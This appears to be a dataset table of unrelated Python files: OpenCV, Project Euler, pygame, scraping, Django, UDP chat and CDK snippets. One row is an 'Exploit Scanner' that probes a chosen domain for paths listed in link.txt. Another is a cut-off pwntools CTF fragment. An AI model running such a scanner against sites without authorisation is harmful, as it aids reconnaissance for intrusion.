text stringlengths 38 1.54M |
|---|
import numpy as np
import sys
import cv2
def func3():
    """Demonstrate OpenCV reference vs. copy semantics.

    img2 is a plain reference to img1 (same pixel buffer), img3 is a
    deep copy; after img1 is filled with yellow, img2 shows yellow too
    while img3 keeps the original picture.
    """
    # -1 == cv2.IMREAD_UNCHANGED: keep the file's own channel layout.
    img1 = cv2.imread('7.17/cat.jpg', -1)
    if img1 is None:
        print('Image load failed!')
        return
    # Reference: shares the same underlying buffer as img1.
    img2 = img1
    # Deep copy: independent buffer.
    img3 = img2.copy()
    img1[:, :] = (0, 255, 255)  # Fill with yellow (BGR).
    cv2.imshow('img1', img1)
    cv2.imshow('img2', img2)
    cv2.imshow('img3', img3)
    cv2.waitKey()
    cv2.destroyAllWindows()
if __name__ == '__main__' :
    func3()
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from urllib2 import Request, urlopen, URLError, HTTPError
# NOTE(review): Python 2 script (print statements, urllib2, raw_input).
def Space(j):
    # Print j+1 space pairs on one line (trailing comma suppresses the newline).
    i = 0
    while i<=j:
        print " ",
        i+=1
def CnsAdmin():
    # Probe http://<link>/<path> for every path listed in link.txt and
    # report the URLs that respond without an HTTP/URL error.
    f = open("link.txt","r");
    link = raw_input("😈 Web 😈 \n(Domain : example.com Yada www.example.com ): ")
    # NOTE(review): "\M" is not a valid escape (backslash kept literally);
    # "\n\n" was probably intended — confirm before changing output.
    print "\n\Mevcut Exploitler : \n"
    while True:
        sub_link = f.readline()
        if not sub_link:
            break  # end of file
        req_link = "http://"+link+"/"+sub_link
        req = Request(req_link)
        try:
            response = urlopen(req)
        except HTTPError as e:
            continue  # HTTP error status -> try next path
        except URLError as e:
            continue  # unreachable host / malformed URL -> try next path
        else:
            print "Exploit ➤ ",req_link
def Credit():
    # Banner printed before scanning starts.
    Space(9); print " SeS.py "
    Space(9); print" Instagram can_s_officiall "
    Space(9); print " Exploit Scanner "
Credit()
CnsAdmin()
import math
# import timeit
# timeit.repeat("f1(x)", "from __main__ import f1", repeat=3, number=100)
# Digits Greatest
# 1 9 * 1 = 9
# 2 99 * 91 = 9009
# 3 993 * 913 = 906609
# 4 9999 * 9901 = 99000099
# 5 99989 * 99681 = 9966006699
# 6 999999 * 999001 = 999000000999
# 7 9998017 * 9997647 = 99956644665999
# 8 99999999 * 99990001 = 9999000000009999
# 9
# 10 9999999999 * 9999900001 = 99999000000000099999
# Much slower than using string array methods
def reverse(n):
    """Return the decimal digits of non-negative integer *n* reversed.

    E.g. reverse(123) == 321.  For n <= 0 the loop body never runs and
    0 is returned.
    """
    # Renamed from `reversed` to avoid shadowing the builtin used
    # elsewhere in this file.
    reversed_n = 0
    while n > 0:
        reversed_n = 10 * reversed_n + n % 10
        # Floor division keeps n an int on both Python 2 and 3; the
        # original `n = n / 10` becomes float division under Python 3
        # and breaks the digit arithmetic.
        n //= 10
    return reversed_n
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in range(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits))):
## for j in range(int(math.pow(10, factorDigits -1)), int(math.pow(10, factorDigits))):
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## if i * j > largestFound:
## largestFound = i * j
## return largestFound
# Does not repeat any factor pairs => roughly twice as fast
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in range(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits))):
## for j in range(i, int(math.pow(10, factorDigits))):
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## if i * j > largestFound:
## largestFound = i * j
## return largestFound
# Try largest factors first and continue downwards
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## for j in reversed(xrange(int(math.pow(10, factorDigits - 1)), i + 1)):
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## if i * j > largestFound:
## largestFound = i * j
## return largestFound
# Skip smaller factor pairs once a palindrome product is found for a given factor
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## for j in reversed(xrange(int(math.pow(10, factorDigits - 1)), i + 1)):
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## if i * j > largestFound:
## largestFound = i * j
## break
## return largestFound
# End once remaining factor pairs cannot produce greater products
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## if largestFound >= i * i:
## break
## for j in reversed(xrange(int(math.pow(10, factorDigits - 1)), i + 1)):
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## if i * j > largestFound:
## largestFound = i * j
## break
## return largestFound
# More aggressively ends once remaining factor pairs cannot produce greater products
# Each product found is guaranteed to be greater than the last
# Increasing optimization as value of last product found increases
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## if largestFound >= i * i:
## break
## for j in reversed(xrange(int(math.pow(10, factorDigits - 1)), i + 1)):
## if largestFound >= i * j:
## break
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## if i * j > largestFound:
## largestFound = i * j
## break
## return largestFound
##def largestPalindromeProduct(factorDigits):
## largestFound = 1
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## if largestFound >= i * i:
## break
## for j in reversed(xrange(max(int(math.pow(10, factorDigits - 1)), largestFound / i), i + 1)):
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## largestFound = i * j
## break
## return largestFound
# Improved try largest factors first
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## if largestFound >= i * (math.pow(10, factorDigits) - 1):
## break
## for j in reversed(xrange(i, int(math.pow(10, factorDigits)))):
## if largestFound >= i * j:
## break
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## if i * j > largestFound:
## largestFound = i * j
## break
## return largestFound
# Try range further narrowed so that tested factor pairs can strictly produce a greater product
# Marginally faster for 7 factorDigits than alternate
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## if largestFound >= i * (math.pow(10, factorDigits) - 1):
## break
## for j in reversed(xrange(max(i, int(math.ceil(largestFound / float(i)))), int(math.pow(10, factorDigits)))):
## if largestFound >= i * j:
## break
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## if i * j > largestFound:
## largestFound = i * j
## break
## return largestFound
# Unnecessary checks removed
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## if largestFound >= i * (math.pow(10, factorDigits) - 1):
## break
## for j in reversed(xrange(max(i, int(math.ceil(largestFound / float(i)))), int(math.pow(10, factorDigits)))):
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## largestFound = i * j
## break
## return largestFound
# Only check factor pairs where at least one factor is a multiple of 11
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## if factorDigits == 1:
## return 9
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## if largestFound >= i * (math.pow(10, factorDigits) - 1):
## break
## if i % 11 == 0:
## j = int(math.pow(10, factorDigits))
## dj = 1
## else:
## j = int(math.pow(10, factorDigits)) / 11 * 11
## dj = 11
## while j > i and j > largestFound / i:
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## largestFound = i * j
## break
## j = j - dj
## return largestFound
# For loop version, slightly faster
def largestPalindromeProduct(factorDigits):
    """Return the largest palindromic product of two factorDigits-digit
    numbers (Project Euler #4 generalisation).  Python 2 (xrange/print).

    Optimisation (see the comment block above): except for the 1-digit
    case, at least one factor of the palindrome must be a multiple of
    11, so the inner loop steps by 11 unless i itself is one.
    """
    largestFound = 0
    if factorDigits == 1:
        return 9
    # Try the larger factor i from the top down.
    for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
        # No remaining i can beat largestFound even with the maximal j.
        if largestFound >= i * (math.pow(10, factorDigits) - 1):
            break
        if i % 11 == 0:
            # i covers the multiple-of-11 requirement; j may be anything.
            j1 = max(i, int(math.ceil(largestFound / float(i))))
            j2 = int(math.pow(10, factorDigits))
            dj = 1
        else:
            # j must be a multiple of 11; start at the smallest multiple
            # that can still beat largestFound.
            j1 = int(math.ceil(max(i, math.ceil(largestFound / float(i))) / float(11)) * 11)
            j2 = int(math.pow(10, factorDigits)) / 11 * 11
            dj = 11
        for j in reversed(xrange(j1, j2 + 1, dj)):
            if str(i * j) == str(i * j)[::-1]:
                print "%d * %d = %d" % (i, j, i * j)
                largestFound = i * j
                # First hit for this i is the largest; move to next i.
                break
    return largestFound
##for x in range(100):
# NOTE(review): the loop header above is commented out, so `x` is
# undefined here and this line raises NameError at run time — restore
# the loop or pass a concrete digit count.
print largestPalindromeProduct(x)
##for i in reversed(xrange(10, 100/11*11+1)):
## for j in reversed(xrange(i, 11)):
## print i, j, i * j
##for i in reversed(xrange(int(math.ceil(10 / float(11))) * 11, 100, 11)):
## print i
|
import unittest
import mop
from . import InMemoryDatabase
class DatabaseTest(unittest.TestCase):
    """End-to-end test of InMemoryDatabase: plain values and mop objects."""
    def test_database(self):
        """Insert/lookup plain data, overwrite a key, then round-trip a
        mop-defined Point object and check its serialised form."""
        db = InMemoryDatabase()
        # Plain dict round-trip; store holds the JSON-serialised form.
        db.insert("foo", {"a": 1, "b": 2})
        assert db.lookup("foo") == {"a": 1, "b": 2}
        assert db.store == {"foo": '{"data":{"a":1,"b":2},"type":"plain"}'}
        # Re-inserting the same key overwrites the previous value.
        db.insert("foo", {"a": 3, "c": 5})
        assert db.lookup("foo") == {"a": 3, "c": 5}
        assert db.store == {"foo": '{"data":{"a":3,"c":5},"type":"plain"}'}
        # Lists are supported too, and keys stay independent.
        db.insert("bar", [1, 2, "b"])
        assert db.lookup("foo") == {"a": 3, "c": 5}
        assert db.lookup("bar") == [1, 2, "b"]
        assert db.store == {
            "foo": '{"data":{"a":3,"c":5},"type":"plain"}',
            "bar": '{"data":[1,2,"b"],"type":"plain"}',
        }
        # Build a Point class with the mop meta-object protocol: two
        # attributes (x, y) with reader methods of the same names.
        Point = mop.Class(
            name="Point",
            superclass=mop.Class.base_object_class(),
        )
        Point.add_attribute(Point.attribute_class()(name="x"))
        Point.add_attribute(Point.attribute_class()(name="y"))
        Point.add_method(Point.method_class()(
            name="x",
            body=lambda self: self.metaclass.all_attributes()["x"].value(self)
        ))
        Point.add_method(Point.method_class()(
            name="y",
            body=lambda self: self.metaclass.all_attributes()["y"].value(self)
        ))
        Point.finalize()
        point = Point(x=10, y=23)
        assert point.x() == 10
        assert point.y() == 23
        # Objects serialise with their class name; lookup reconstructs
        # an equivalent but distinct instance.
        db.insert("p", point)
        point2 = db.lookup("p")
        assert point2.x() == 10
        assert point2.y() == 23
        assert point is not point2
        assert db.store == {
            "foo": '{"data":{"a":3,"c":5},"type":"plain"}',
            "bar": '{"data":[1,2,"b"],"type":"plain"}',
            "p": '{"class":"Point","data":{"x":10,"y":23},"type":"object"}',
        }
|
import pygame
from maze import Maze
import game_functions as gf
from pm import PM
from ghosts import Red, Blue, Pink, Orange, Cherry
from stats import Stats
from display import Display
def run_game():
    """Set up pygame and all game objects, then run the main loop.

    The loop only processes input while a round is active, but redraws
    and flips the display every iteration regardless.
    """
    # Initialize pygame, settings, and screen object.
    pygame.init()
    screen = pygame.display.set_mode((630, 800))
    pygame.display.set_caption("PACMAN")
    # Draw maze
    mazefile = 'maze.txt'
    maze = Maze(screen, mazefile)
    # Pacman
    pm = PM(screen, maze)
    # Stats
    stats = Stats()
    # Ghosts
    red = Red(screen, maze)
    blue = Blue(screen, maze)
    pink = Pink(screen, maze)
    orange = Orange(screen, maze)
    cherry = Cherry(screen)
    display = Display(screen, pm)
    while True:
        if stats.game_active:
            gf.check_events(screen, pm, maze, red, blue, pink, orange, stats, display)
        gf.update_screen(screen, pm, maze, red, blue, pink, orange, cherry, stats, display)
        pygame.display.flip()
run_game()
|
# encoding=utf-8
import urllib
import json
import io
from BeautifulSoup import BeautifulSoup
URL = 'https://www.kinopoisk.ru/film/435/'
def parse_url(url):
    """Scrape a kinopoisk.ru film page into a dict of facts (Python 2).

    Fetches the page (served as windows-1251, re-encoded to utf-8) and
    walks the info table pairwise: each label cell is followed by its
    value cell, hence the content[i + 1] accesses.  Returns a dict with
    year, genres, country, budget, usa/world box office,
    age_restriction, duration and rating (zero/empty defaults).
    """
    data = urllib.urlopen(url)
    # Site charset is cp1251; BeautifulSoup here expects utf-8 bytes.
    data = data.read().decode("windows-1251").encode("utf-8")
    soup = BeautifulSoup(''.join(data))
    parsed_data = dict({'year': 0, 'genres':[], 'country': '', 'budget': 0, 'usa': 0, 'world': 0, 'age_restriction': 0,
                        'duration': 0, 'rating': 0})
    content = soup.body.find('div', id='infoTable').findAll('td')
    for i in range(len(content)):
        if content[i].contents[0].string == u'год':  # year
            parsed_data['year'] = content[i + 1].text
        if content[i].contents[0].string == u'страна':  # country
            parsed_data['country'] = content[i + 1].text
        if content[i].contents[0].string == u'бюджет':  # budget
            parsed_data['budget'] = content[i + 1].find('div').text.replace(' ', '').replace(u'сборы', '')
        if content[i].contents[0].string == u'сборы в США':  # US box office
            parsed_data['usa'] = content[i + 1].find('div').text.replace(' ', '').replace(u'сборы', '')
        if content[i].contents[0].string == u'сборы в мире':  # worldwide box office
            parsed_data['world'] = content[i + 1].find('div').text.replace(' ', '').replace(u'сборы', '')
        if content[i].contents[0].string == u'возраст':  # age restriction
            parsed_data['age_restriction'] = content[i + 1].text
        if content[i].contents[0].string == u'время':  # running time
            parsed_data['duration'] = content[i + 1].contents[0].string
    # Aggregate rating lives in a separate block outside the info table.
    content = soup.find('div', id='block_rating', itemprop='aggregateRating').find('a')
    parsed_data['rating'] = content.find('span').string
    for genre in soup.find('span', itemprop="genre").findAll('a'):
        parsed_data['genres'].append(genre.string)
    return parsed_data
# Scrape the film page and persist the parsed fields as pretty-printed
# UTF-8 JSON.  The `with` statement closes the file on exit; the
# explicit film.close() the original carried was redundant.
with io.open('film_info', 'w', encoding='utf-8') as film:
    parsed = parse_url(URL)
    film.write(json.dumps(parsed, indent=4, sort_keys=True, ensure_ascii=False))
|
#! /usr/bin/env python3
import shutil
import subprocess
import sys
KERNEL_OFFSET = 1024 * 512
def _concat(a, b):
while (True):
buf = b.read(4*1024)
if (len(buf) == 0):
break
a.write(buf)
def main():
    """Build a boot image: bootloader binary followed by the kernel ELF.

    argv: <bootloader-elf> <kernel-elf> <output-image>.
    Returns 0 on success, -1 on bad usage; the value becomes the
    process exit code via the SystemExit below.
    """
    if len(sys.argv) != 4:
        return -1
    bootloader = sys.argv[1]
    kernel = sys.argv[2]
    image = sys.argv[3]
    # TODO check `bootloader` and `kernel` exists
    # Generate `bootloader` binary (objcopy raises CalledProcessError
    # on failure, e.g. a missing input file).
    subprocess.check_call(['objcopy', '-Obinary', bootloader, image])
    with open(image, 'r+b') as image_fd:
        # Seek to the end to measure the bootloader size.
        image_fd.seek(0, 2)
        bootloader_len = image_fd.tell()
        print(f"[gen_image] Bootloader size: {bootloader_len} bytes")
        # Append the kernel ELF at the fixed offset; the `with` closes
        # the source file deterministically (the original leaked it).
        image_fd.seek(KERNEL_OFFSET, 0)
        with open(kernel, 'rb') as kernel_fd:
            _concat(image_fd, kernel_fd)
    return 0
if __name__ == '__main__':
    raise SystemExit(main())
|
import numpy as np
import mediapipe as mp
import cv2
mp_drawing = mp.solutions.drawing_utils
mp_hands = mp.solutions.hands
# Function takes in the all the coordinates for all the points, selects the relevants tracking point
# and OUTPUTS the average of all the markers in the xy plane (get centre of hand)
# Function takes in the all the coordinates for all the points, selects the relevants tracking point
# and OUTPUTS the average of all the markers in the xy plane (get centre of hand)
def get_params(hand_landmarks):
    """Return the [x, y] centre of a detected hand.

    Collects six MediaPipe landmarks (wrist plus the five fingertips)
    as xyz arrays, then averages only the x and y components; z is
    captured but never used in the average.
    """
    points = {}
    parameters = ['INDEX_TIP', 'WRIST', 'MIDDLE_FINGER', 'RING_FINGER', 'PINKY_FINGER', 'THUMB']
    index_points = hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP]
    points['INDEX_TIP'] = np.array([index_points.x, index_points.y, index_points.z])
    wrist_points = hand_landmarks.landmark[mp_hands.HandLandmark.WRIST]
    points['WRIST'] = np.array([wrist_points.x, wrist_points.y, wrist_points.z])
    middle_finger_points = hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP]
    points['MIDDLE_FINGER'] = np.array([middle_finger_points.x, middle_finger_points.y, middle_finger_points.z])
    ring_finger_points = hand_landmarks.landmark[mp_hands.HandLandmark.RING_FINGER_TIP]
    points['RING_FINGER'] = np.array([ring_finger_points.x, ring_finger_points.y, ring_finger_points.z])
    pinky_points = hand_landmarks.landmark[mp_hands.HandLandmark.PINKY_TIP]
    points['PINKY_FINGER'] = np.array([pinky_points.x, pinky_points.y, pinky_points.z])
    thumb_points = hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_TIP]
    points['THUMB'] = np.array([thumb_points.x, thumb_points.y, thumb_points.z])
    # Average x (index 0) and y (index 1) over all six landmarks.
    hand_x_value = sum([points[i][0] for i in
                        parameters]) / len(parameters)
    hand_y_value = sum([points[i][1] for i in
                        parameters]) / len(parameters)
    return [hand_x_value, hand_y_value]
#inputs the x,y for the centre of the hand
# Outputs the discrete/ qualitative position of the centre of the hand
def gridify(xy_array):
    """Map a normalised [x, y] hand centre to a screen quadrant name.

    Boundary handling mirrors the original if/elif chain: x == 0.5
    counts as the right half; on the right half, y == 0.5 is 'Top
    Right', while on the left half y == 0.5 is 'Bottom Left'.
    """
    x, y = xy_array[0], xy_array[1]
    if x >= 0.5:
        return 'Bottom Right' if y > 0.5 else 'Top Right'
    return 'Bottom Left' if y >= 0.5 else 'Top Left'
# Inputs x,y values that are bothh in the range [0,1]
# Outputs absolute x,y positionn by multiplyinng the ratios by image dimensions to get the pixels where to place stuff
def ratio_to_pixel(coordinates, image_shape):
    """Convert normalised [x, y] (each in [0, 1]) to pixel coordinates.

    image_shape is the frame's (rows, cols, channels) tuple.  Returns
    None when coordinates is None so callers can skip drawing.
    """
    # Check the sentinel before touching image_shape (the original
    # unpacked image_shape first, doing needless work on the None path).
    if coordinates is None:
        return None
    rows, cols, _ = image_shape
    # x scales by image width (cols), y by image height (rows).
    return np.array(coordinates) * np.array([cols, rows])
# takes the image frame, coordinates [x,y] in absolute and the classification
# outputs the image with the text appearinng at the absolute coordinates
def label_params(frame, coordinates, text):
    """Draw *text* on *frame* at pixel position *coordinates*.

    Mutates the frame in place via cv2.putText (green, small font).
    No-op when coordinates is None (e.g. no hand detected this frame).
    """
    if coordinates is None:
        return
    cv2.putText(frame, text, (int(coordinates[0]), int(coordinates[1])),
                cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)
# Inputs Grid Location as String (ie: 'Top Right')
# Outputs Corresponding Note
def location_to_note(location: str) -> str:
    """Translate a quadrant name into its musical note.

    'Bottom Right' — and any unrecognised location — maps to 'F',
    matching the original chain's final else branch.
    """
    note_by_location = {
        'Top Left': 'C',
        'Top Right': 'D',
        'Bottom Left': 'E',
    }
    return note_by_location.get(location, 'F')
import pygal
import csv
import operator
from matplotlib import pyplot as plt
from datetime import datetime
import os, re
#from clases.productos import Producto
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "subastas.settings")
import django
django.setup()
from django.db import models
from ah.models import Producto, Cotizacion
class Graficador():
    """Renders price-evolution charts for a product."""
    def obtenerGraficaEvolucion(self, producto):
        """Build an SVG line chart (min/max/average over time) from the
        product's quotes CSV.

        NOTE(review): both the input CSV and the output SVG paths are
        hard-coded to 'Rosaluz' while only the chart title uses
        *producto* — presumably the paths should be derived from the
        product as well; confirm against callers.
        """
        formatoFecha = "%H:%M:%S"  # NOTE(review): unused in this method
        minimos = []
        maximos = []
        fechas = []
        promedios = []
        # Open the CSV as a file; rows are (date, min, max, average).
        with open('ah/resultados/Rosaluz.csv', encoding='utf8') as f:
            reader = csv.reader(f)
            # Walk every CSV row, collecting one series per column.
            for row in reader:
                fechas.append(str(row[0]))
                maximos.append(float(row[2]))
                minimos.append(float(row[1]))
                promedios.append(float(row[3]))
        # Draw the line chart and write it out as SVG.
        line_chart = pygal.Line()
        line_chart.title = ('Evolucion de '+producto.nombre)
        line_chart.x_labels = fechas
        line_chart.add('Maximos', maximos)
        line_chart.add('Minimos', minimos)
        line_chart.add('Promedio', promedios)
        line_chart.render_to_file('media/graficas/Rosaluz.svg')
|
import socket
import threading
def send_message(udp):
    """Prompt once for the peer's address/port, then loop forever
    reading lines from stdin and sending each as a UDP datagram.

    Runs in its own thread; see main().
    """
    addr = input("enter destination ip:")
    port = int(input("enter destination port:"))
    while True:
        message = input("enter message to send:")
        udp.sendto(message.encode(), (addr, port))
def recv_message(udp):
    """Receive datagrams on *udp* forever and print their decoded text.

    Runs in its own thread; see main().  The original bound the payload
    to a local named `recv_message`, shadowing this very function, and
    mislabelled the sender tuple's port element as an address.
    """
    while True:
        # recvfrom returns (payload, (sender_ip, sender_port)).
        payload, (sender_ip, sender_port) = udp.recvfrom(1024)
        print(payload.decode())
def main():
    """Bind a UDP socket to a user-chosen local port and run the send
    and receive loops concurrently in two threads sharing the socket."""
    udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    local_port = int(input("enter your local port:"))
    local_addr = ("", local_port)
    udp.bind(local_addr)  # bind local address to inform your address to the one you chat with
    thread1 = threading.Thread(target=send_message, args=(udp,))
    thread2 = threading.Thread(target=recv_message, args=(udp,))
    thread1.start()
    thread2.start()
if __name__ == '__main__':
    main()
|
from similarity import *
# WEIGHT_TFIDF = 0.25
# WEIGHT_PRICE = 0.25
# WEIGHT_ORDERING = 0.25
# WEIGHT_CUISINE = 0.25
def calc_r2u(user, restaurant, tfidf, weight):
    """Restaurant-to-user score: the weighted sum of the tf-idf score
    and the price / ordering / cuisine similarities, each scaled by its
    entry in the *weight* dict."""
    components = [
        tfidf * weight["tfidf"],
        calc_price_sim(user['price'], restaurant['price']) * weight["price"],
        calc_ordering_sim(user['ordering'], restaurant['ordering']) * weight["ordering"],
        calc_cuisine_sim(user['cuisine'], restaurant['cuisine']) * weight["cuisine"],
    ]
    return sum(components)
def calc_price_sim(user, restaurant):
    # Price similarity: delegates to the shared similarity() helper
    # (star-imported from the similarity module).
    return similarity(user, restaurant)
def calc_ordering_sim(user, restaurant):
    # Ordering-preference similarity: same shared helper.
    return similarity(user, restaurant)
def calc_cuisine_sim(user, restaurant):
    # Cuisine similarity: same shared helper.
    return similarity(user, restaurant)
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import webapp2
import os
import urllib
import jinja2
import datetime
import sys
from google.appengine.api import mail
from google.appengine.api import users
from google.appengine.api import urlfetch
from google.appengine.ext import db
from models import User
if 'libs' not in sys.path:
sys.path[0:0] = ['libs']
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True
)
class Unsubscribe(webapp2.RequestHandler):
    """GET renders the unsubscribe form; POST deactivates the account."""
    def get(self):
        # NOTE(review): unused import left behind.
        from tweepy import API
        template = JINJA_ENVIRONMENT.get_template('templates/unsubscribe.html')
        self.response.write(template.render({}))
    def post(self):
        """Deactivate the User record matching the posted Twitter
        username and notify the user by e-mail.  (Python 2 / GAE.)"""
        #Get variables from post
        twitterUsername = self.request.get('twitterUsername')
        found = False
        template = JINJA_ENVIRONMENT.get_template('templates/template.html')
        #get pseudo
        # NOTE(review): GQL built via string interpolation is
        # injection-prone; prefer bound parameters (":1" placeholders).
        users = db.GqlQuery("SELECT * FROM User WHERE twitterUsername ='%s'" %(twitterUsername) )
        for res in users:
            found = True
            if not res.active:
                #already deactivated
                # NOTE(review): user-facing "you account" should read
                # "your account" (here and below).
                templateVars = { "message" : 'you account is already deactivated'}
                self.response.write(template.render(templateVars) )
            else:
                #now deactivated
                print 'correspondance'
                res.active=False
                res.put()
                templateVars = { "message" : 'you account has been deactivated'}
                self.response.write(template.render(templateVars) )
                sendMail(res.mail,res.twitterUsername,res.firstName)
        if not found:
            templateVars = { "message" : "there is no profile linked to this username"}
            self.response.write(template.render(templateVars) )
def sendMail(email,twitterUsername,firstName):
    """E-mail *email* that the account tied to *twitterUsername* was
    deactivated, via the App Engine mail API.

    The sender address comes from the admin_mail environment variable.
    """
    message = mail.EmailMessage(sender="Admin <%s>"%(os.environ['admin_mail']), subject="Account unactivated")
    message.to = "%s <%s>"%(twitterUsername,email)
    message.body = """
    Hi %s
    Your account has been deactivated
    """%(firstName)
    message.send()
# WSGI application: route /unsubscribe to the handler above.
app = webapp2.WSGIApplication([
    ('/unsubscribe', Unsubscribe)
], debug=True)
|
from django.contrib import admin
from .models import Employee,EmployeeEducationDetail,EmployeeWorkDetail
# Expose the employee models in the Django admin site.
admin.site.register(Employee)
admin.site.register(EmployeeEducationDetail)
admin.site.register(EmployeeWorkDetail)
# Register your models here.
|
# NOTE(review): this is a set literal, not a list — iteration order is
# arbitrary, so the three names may print in any order.
bike={"yamaha","apache","fz"}
#loop through the set
for x in bike:
    print(x)
# possible output (order not guaranteed):
#yamaha
#apache
#fz
|
from django.db import models
from django.core.validators import RegexValidator
class Customers(models.Model):
    """Customer record keyed by a Turkish national ID number (TC)."""
    # 11-digit TC: first digit 1-9, nine more digits, even final digit
    # (per the regex); must be unique per customer.
    TC = models.CharField(max_length=11, validators=[
        RegexValidator(regex=r'^[1-9]{1}[0-9]{9}[02468]{1}$', message='Invalid TC', code='nomatch')],
        null=False, unique=True)
    Name = models.CharField(max_length=50)
    Surname = models.CharField(max_length=50)
    Phone = models.CharField(max_length=11)  # format : 0111 111 11 11
    City = models.CharField(max_length=25)
    Town = models.CharField(max_length=25)
    def __str__(self):
        # Display customers as "Name Surname" in admin and shells.
        return self.Name + " " + self.Surname
|
# Compatibility shim: register the 'egg' format with distutils' bdist
# command so `bdist --formats=egg` dispatches to bdist_egg.
from distutils.command.bdist import bdist
import sys
if 'egg' not in bdist.format_commands:
    try:
        # Newer (setuptools-vendored) distutils: format_commands is a
        # mapping of format -> (command name, description).
        bdist.format_commands['egg'] = ('bdist_egg', "Python .egg file")
    except TypeError:
        # For backward compatibility with older distutils (stdlib)
        # where format_command is the dict and format_commands a list.
        bdist.format_command['egg'] = ('bdist_egg', "Python .egg file")
        bdist.format_commands.append('egg')
# Avoid leaking module-level names if this module is star-imported.
del bdist, sys
|
#!/usr/bin/env python3
from aws_cdk import core
from aws_lambda.aws_lambda_stack import AwsLambdaStack
# CDK application entry point: synthesise a single Lambda stack
# pinned to the eu-central-1 region.
app = core.App()
AwsLambdaStack(app, "aws-lambda", env=core.Environment(region="eu-central-1"))
app.synth()
|
from pwn import *
byte_table=[0x0BB,0x2,0x9B,0x3,0x0C4,0x4,0x6C,0x5,0x4A,0x6,0x2E,0x7,0x22,
0x8,0x45,0x9,0x33,0x0A,0x0B8,0x0B,0x0D5,0x0C,0x6,0x0D,0x0A,
0x0E,0x0BC,0x0F,0x0FA,0x10,0x79,0x11,0x24,0x12,0x0E1,
0x13,0x0B2,0x14,0x0BF,0x15,0x2C,0x16,0x0AD,0x17,0x86,
0x18,0x60,0x19,0x0A4,0x1A,0x0B6,0x1B,0x0D8,0x1C,0x59,
0x1D,0x87,0x1E,0x41,0x1F,0x94,0x20,0x77,0x21,0x0F0,0x22,
0x4F,0x23,0x0CB,0x24,0x61,0x2,0x25,0x26,0x0C0,0x27,
0x97,0x28,0x2A,0x29,0x5C,0x2A,0x8,0x2B,0x0C9,0x2C,0x9F,
0x2D,0x43,0x2E,0x4E,0x2F,0x0CF,0x30,0x0F9,0x31,0x3E,
0x32,0x6F,0x33,0x65,0x34,0x0E7,0x35,0x0C5,0x36,0x39,
0x37,0x0B7,0x38,0x0EF,0x39,0x0D0,0x3A,0x0C8,0x3B,0x2F,
0x3C,0x0AA,0x3D,0x0C7,0x3E,0x47,0x3F,0x3C,0x40,0x81,
0x41,0x32,0x42,0x49,0x43,0x0D3,0x44,0x0A6,0x45,0x96,
0x46,0x2B,0x47,0x58,0x48,0x40,0x49,0x0F1,0x4A,0x9C,0x4B,
0x0EE,0x4C,0x1A,0x4D,0x5B,0x4E,0x0C6,0x4F,0x0D6,0x50,
0x80,0x51,0x2D,0x52,0x6D,0x53,0x9A,0x54,0x3D,0x55,0x0A7,
0x56,0x93,0x57,0x84,0x58,0x0E0,0x59,0x12,0x5A,0x3B,0x5B,
